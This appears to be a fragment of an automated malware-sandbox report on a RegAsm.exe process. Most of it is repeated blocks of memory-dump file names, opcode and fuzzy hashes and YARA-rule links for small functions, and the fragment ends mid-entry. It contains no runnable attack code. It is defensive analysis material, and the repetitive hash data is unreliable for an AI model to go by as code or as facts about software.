                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                              Function 02211930 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                              Function 0220F938 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                              Function 0220F900 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                              Function 0220FE24 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                              Function 0220FEA0 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                              Function 0220FED0 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                              Function 0220FF34 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                              Function 0220FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                              Function 0220FFFC Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                              Function 0220FC30 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                              Function 0220FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                              Function 0220FC48 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                              Function 0220FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                              Function 0220FD5C Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                              Function 02211D80 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                              Function 0220FD8C Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                              Function 02238788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 022387E6
                                              • Kernel-MUI-Language-SKU, xrefs: 022389FC
                                              • WindowsExcludedProcs, xrefs: 022387C1
                                              • Kernel-MUI-Language-Disallowed, xrefs: 02238914
                                              • Kernel-MUI-Language-Allowed, xrefs: 02238827
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
                                              • Associated: 00000003.00000002.495105727.00000000021F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.00000000022F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002300000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.495105727.0000000002360000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_21f0000_RegAsm.jbxd
                                              Similarity
                                              • API ID: _wcspbrk
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 402402107-258546922
                                              • Opcode ID: 4564902ae830a25e858ef5b9c99f9539fccf932ab7ef4a4f91339126f081f225
                                              • Instruction ID: cbac09ec524e05b4f29bcc65647ff447b09c3cb0d8c5385178c3c5ed31398a78
                                              • Opcode Fuzzy Hash: 4564902ae830a25e858ef5b9c99f9539fccf932ab7ef4a4f91339126f081f225
                                              • Instruction Fuzzy Hash: BFF1F5B2D20209EFCB12EFD4C980DEEB7B9FB08304F11446AE505A7254E735AA55DF61
                                              Function 022A822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.495105727.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: true
